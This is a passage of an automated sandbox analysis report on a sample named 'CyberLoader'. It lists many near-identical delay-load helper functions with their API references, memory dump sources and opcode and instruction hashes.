                                                    • Part of subcall function 0028DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028DFE7
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                  • String ID:
                                                  • API String ID: 1269201914-0
                                                  • Opcode ID: 7d7e716b58fe40568e9abfb6896e85597a005bb95cb7d5b622425f69a07129e0
                                                  • Instruction ID: fe626092f2a3df8e7ce67cc05db7c6ac537a38b9e2a4bf928cfb1a9740a5ef61
                                                  • Opcode Fuzzy Hash: 7d7e716b58fe40568e9abfb6896e85597a005bb95cb7d5b622425f69a07129e0
                                                  • Instruction Fuzzy Hash: FAB012A927E501BD314871146C06E36031CC4D3B12330811BF10DD01C2D8809C7E5A31
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0028D8FC Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028D8A3
                                                    • Part of subcall function 0028DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028DFD6
                                                    • Part of subcall function 0028DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028DFE7
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                  • String ID:
                                                  • API String ID: 1269201914-0
                                                  • Opcode ID: cd9563aecd7af5c416d5127f9bbc6e8073fc0b8c5484db36b64008a8ac2d4511
                                                  • Instruction ID: f2ced702017c57dcc9f4531189f4ac56e47a8e79dc06c02a000d48f9dbc22979
                                                  • Opcode Fuzzy Hash: cd9563aecd7af5c416d5127f9bbc6e8073fc0b8c5484db36b64008a8ac2d4511
                                                  • Instruction Fuzzy Hash: B4B012A927E402BD310C7115AC06E36031CC4D3B12330801BF10DD01C2D8809C3E5A31
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0028D8F2 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028D8A3
                                                    • Part of subcall function 0028DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028DFD6
                                                    • Part of subcall function 0028DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028DFE7
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                  • String ID:
                                                  • API String ID: 1269201914-0
                                                  • Opcode ID: 67d36eb7d73ac12c2cd7ed130643045c8826cdb0f794d843bd8707fac9d5bb18
                                                  • Instruction ID: 90d42d3077abc1e91131be848cc01de48bb66d542fafc29e40c26426476bb10d
                                                  • Opcode Fuzzy Hash: 67d36eb7d73ac12c2cd7ed130643045c8826cdb0f794d843bd8707fac9d5bb18
                                                  • Instruction Fuzzy Hash: 0CB012A927E401BD310C71146D06E36031CC4D3B12330801BF10DD01C2D8809D3F5A31
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0028D8CA Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028D8A3
                                                    • Part of subcall function 0028DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028DFD6
                                                    • Part of subcall function 0028DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028DFE7
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                  • String ID:
                                                  • API String ID: 1269201914-0
                                                  • Opcode ID: 19fc944c515948d112dc26277a7d3eddcb7a2d250f71d42a83961880f2120cc4
                                                  • Instruction ID: 10a6ea118b35d676c2438c0cba668f5ab36cb50485fe2ac960a786f331c9ae13
                                                  • Opcode Fuzzy Hash: 19fc944c515948d112dc26277a7d3eddcb7a2d250f71d42a83961880f2120cc4
                                                  • Instruction Fuzzy Hash: F3B0129927E401BD310C71146D06D36032CC4D3B12330C01BF10DD02C2D8809C3F5A31
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0028D8C0 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028D8A3
                                                    • Part of subcall function 0028DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028DFD6
                                                    • Part of subcall function 0028DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028DFE7
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                  • String ID:
                                                  • API String ID: 1269201914-0
                                                  • Opcode ID: 767a44acfafb5aa2044aaa0a44bc5b2ea0c34c8fb5568231b73dd829c425de26
                                                  • Instruction ID: 48a33f907bfd4cb5b5245e880c8389aff0fa82eaca0405ac0f7151ac3d8749af
                                                  • Opcode Fuzzy Hash: 767a44acfafb5aa2044aaa0a44bc5b2ea0c34c8fb5568231b73dd829c425de26
                                                  • Instruction Fuzzy Hash: 64B0129927E501BD314871146C06D36032CC4D3B12330C11BF10DD02C2D8809CBE5A31
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0028D8DE Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028D8A3
                                                    • Part of subcall function 0028DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028DFD6
                                                    • Part of subcall function 0028DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028DFE7
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                  • String ID:
                                                  • API String ID: 1269201914-0
                                                  • Opcode ID: 6a76e937ebcfefb97a0f99a768430d0978cb54796f7056262db855966faf761d
                                                  • Instruction ID: d4df3911df450ee9785cf13c482633b4bb6c4eb2ca198474c12c048a537d2e65
                                                  • Opcode Fuzzy Hash: 6a76e937ebcfefb97a0f99a768430d0978cb54796f7056262db855966faf761d
                                                  • Instruction Fuzzy Hash: FCB012A927E401BD310871146C06E36031CC4D3B12330C01BF50DD01C2D8809C3E5A31
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0028D92E Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028D8A3
                                                    • Part of subcall function 0028DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028DFD6
                                                    • Part of subcall function 0028DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028DFE7
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                  • String ID:
                                                  • API String ID: 1269201914-0
                                                  • Opcode ID: ee06a2f4dd6671b21aec41f246d7e1aff53e6ff70e20b89a08166ba8055d4595
                                                  • Instruction ID: 70bb431f966a6681c8a7f896374f838e3f30325dc358b1faf056855db675210f
                                                  • Opcode Fuzzy Hash: ee06a2f4dd6671b21aec41f246d7e1aff53e6ff70e20b89a08166ba8055d4595
                                                  • Instruction Fuzzy Hash: 57B0129927E401BD310971246C07D36035CC8D3B12330C01BF60DD01C2D9809C3D5E31
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0028D924 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028D8A3
                                                    • Part of subcall function 0028DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028DFD6
                                                    • Part of subcall function 0028DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028DFE7
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                  • String ID:
                                                  • API String ID: 1269201914-0
                                                  • Opcode ID: ba120985b31fae6d2b6093b043e6b054e5431006e2d1b2d8a8e1e42cc73cda7c
                                                  • Instruction ID: 2df1729766d9ef2218bfef13630ba26274b1bc89379a59aaba3c6e0af0247f15
                                                  • Opcode Fuzzy Hash: ba120985b31fae6d2b6093b043e6b054e5431006e2d1b2d8a8e1e42cc73cda7c
                                                  • Instruction Fuzzy Hash: 6FB012A927F402BD310871146D06D36035DC8D3B12330801BF14DD01C2D8809C3D5A31
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0028D906 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028D8A3
                                                    • Part of subcall function 0028DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028DFD6
                                                    • Part of subcall function 0028DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028DFE7
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                  • String ID:
                                                  • API String ID: 1269201914-0
                                                  • Opcode ID: 62f5dd646c6b7952e68557b31c7e3e10aa602586b623a248661e5b51a5d6d4a6
                                                  • Instruction ID: f43fe7b8c25a11906739229e72ecd32edb6ea5f372fdd1c1e0008197094c161f
                                                  • Opcode Fuzzy Hash: 62f5dd646c6b7952e68557b31c7e3e10aa602586b623a248661e5b51a5d6d4a6
                                                  • Instruction Fuzzy Hash: 61B012A927F401BD310871146D06D36031DC4D3B12330C01BF54DD01C2D8809C3D5A31
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0028D910 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028D8A3
                                                    • Part of subcall function 0028DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028DFD6
                                                    • Part of subcall function 0028DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028DFE7
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                  • String ID:
                                                  • API String ID: 1269201914-0
                                                  • Opcode ID: d36e6992accda23a2105316a81f19e5ddd5008ecf9de21689f6908695ff35290
                                                  • Instruction ID: b24dc51bc5afd8251621d76eb8c717d22a0580a9474c65fd151cb0ed8bbb563c
                                                  • Opcode Fuzzy Hash: d36e6992accda23a2105316a81f19e5ddd5008ecf9de21689f6908695ff35290
                                                  • Instruction Fuzzy Hash: F6B012B927F501BD314872546D06D36031DC4D3B12330811BF14DD01C2D8809C7D5A31
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0028D942 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028D8A3
                                                    • Part of subcall function 0028DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028DFD6
                                                    • Part of subcall function 0028DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028DFE7
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                  • String ID:
                                                  • API String ID: 1269201914-0
                                                  • Opcode ID: 8a4b7dcaad54097517c5681ea8cbae28c663061a03f7135f44bf2f26a2c1ff57
                                                  • Instruction ID: 5e9c514cda28f492b752afc7b417fe4e10da99776657a79bc8fe66e18916713b
                                                  • Opcode Fuzzy Hash: 8a4b7dcaad54097517c5681ea8cbae28c663061a03f7135f44bf2f26a2c1ff57
                                                  • Instruction Fuzzy Hash: 99B012A927E401BD310D71146D07D36039CC8D3B12330C01BF10DD01C2D8809C3E5E31
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0028DACF Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028DAB2
                                                    • Part of subcall function 0028DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028DFD6
                                                    • Part of subcall function 0028DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028DFE7
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                  • String ID:
                                                  • API String ID: 1269201914-0
                                                  • Opcode ID: bb643237a594bf77109c36984fe5d5e21468cb174c7c4f8ff2ad890cf0a7dee7
                                                  • Instruction ID: 3188237d6af08422bbee1d6cd2003ff454e8aad98e5904d192f76c1876533bc4
                                                  • Opcode Fuzzy Hash: bb643237a594bf77109c36984fe5d5e21468cb174c7c4f8ff2ad890cf0a7dee7
                                                  • Instruction Fuzzy Hash: 95B012AD27E001ED320C71066C02D3A035CC0E1B11330C11BF409C01C5D8844C3D9E31
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0028DAD9 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028DAB2
                                                    • Part of subcall function 0028DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028DFD6
                                                    • Part of subcall function 0028DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028DFE7
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                  • String ID:
                                                  • API String ID: 1269201914-0
                                                  • Opcode ID: bcb0cabc9a6969dc616f566f10fc78f05f91fa3a6d9f92ee5100685ddbccdb90
                                                  • Instruction ID: 9d7198be2c73c7dcca617a98b2c31a024ed9e4c7d15bc077696e48263887159d
                                                  • Opcode Fuzzy Hash: bcb0cabc9a6969dc616f566f10fc78f05f91fa3a6d9f92ee5100685ddbccdb90
                                                  • Instruction Fuzzy Hash: 8EB0129D27E001AD310C71066C02E3E035CC0E5B11330C51BF109C01C9D8804C3D9E31
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0028DB01 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028DAB2
                                                    • Part of subcall function 0028DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028DFD6
                                                    • Part of subcall function 0028DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028DFE7
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                  • String ID:
                                                  • API String ID: 1269201914-0
                                                  • Opcode ID: 45747c3c86d6499c829616f032c8cdf3ca565665e80d1be3d3bc5e590238a433
                                                  • Instruction ID: f42eea0f785417fb5ce7d4fda9607767efc0940ebf24b60eec9768fac761e10c
                                                  • Opcode Fuzzy Hash: 45747c3c86d6499c829616f032c8cdf3ca565665e80d1be3d3bc5e590238a433
                                                  • Instruction Fuzzy Hash: 64B0129D2BE101AE310C71066C02E3A035CD0E2B12330811BF009C01C5D8804C3C9F31
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0028DBE8 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028DBD5
                                                    • Part of subcall function 0028DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028DFD6
                                                    • Part of subcall function 0028DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028DFE7
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
